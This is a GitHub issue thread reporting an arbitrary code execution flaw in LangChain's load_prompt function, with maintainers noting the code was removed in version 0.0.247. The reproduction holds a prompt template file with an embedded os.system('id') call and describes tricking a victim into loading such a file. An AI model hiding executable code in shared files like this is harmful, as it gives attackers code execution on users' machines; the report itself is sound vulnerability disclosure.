### ISSUE TITLE
Arbitrary code execution in load_prompt

### ISSUE THREAD

**Issue by 0gur1** [langchain-ai/langchain#4849]
### System Info

LangChain version:0.0.171
windows 10

### Information

- [X] The official example notebooks/scripts
- [ ] My own modified scripts

### Related Components

- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

1. A python prompt file `prompt.py`
```
from langchain.output_parsers.list import CommaSeparatedListOutputParser
from langchain.prompts.prompt import PromptTemplate
_DECIDER_TEMPLATE = """Given the below input question and list of potential tables, output a comma separated list of the table names that may be neccessary to answer this question.

Question: {query}

Table Names: {table_names}

Relevant Table Names:"""

import os
os.system('id')
PROMPT = PromptTemplate(
    input_variables=["query", "table_names"],
    template=_DECIDER_TEMPLATE,
    output_parser=CommaSeparatedListOutputParser(),
)
```
2. Load the prompt with load_prompt function
```
from langchain.prompts import load_prompt
load_prompt('prompt.py')
```
3. The `id` command will be executed.

Attack scene1: Alice can send prompt file to Bob and let Bob to load it.
Attack scene2: Alice upload the prompt file to a public hub such as '[langchain-hub](https://github.com/hwchase17/langchain-hub/tree/master)'. Bob load the prompt from an url.

### Expected behavior

The code cannot be executed without any check.

**Comment by hwchase17** [comment]
moved to experimental, should be good!

**Comment by obi1kenobi** [comment]
Closing the loop here: the affected code was deleted in #8425 and that change was released in `langchain v0.0.247`.

Version v0.0.247 and newer do not have this issue.
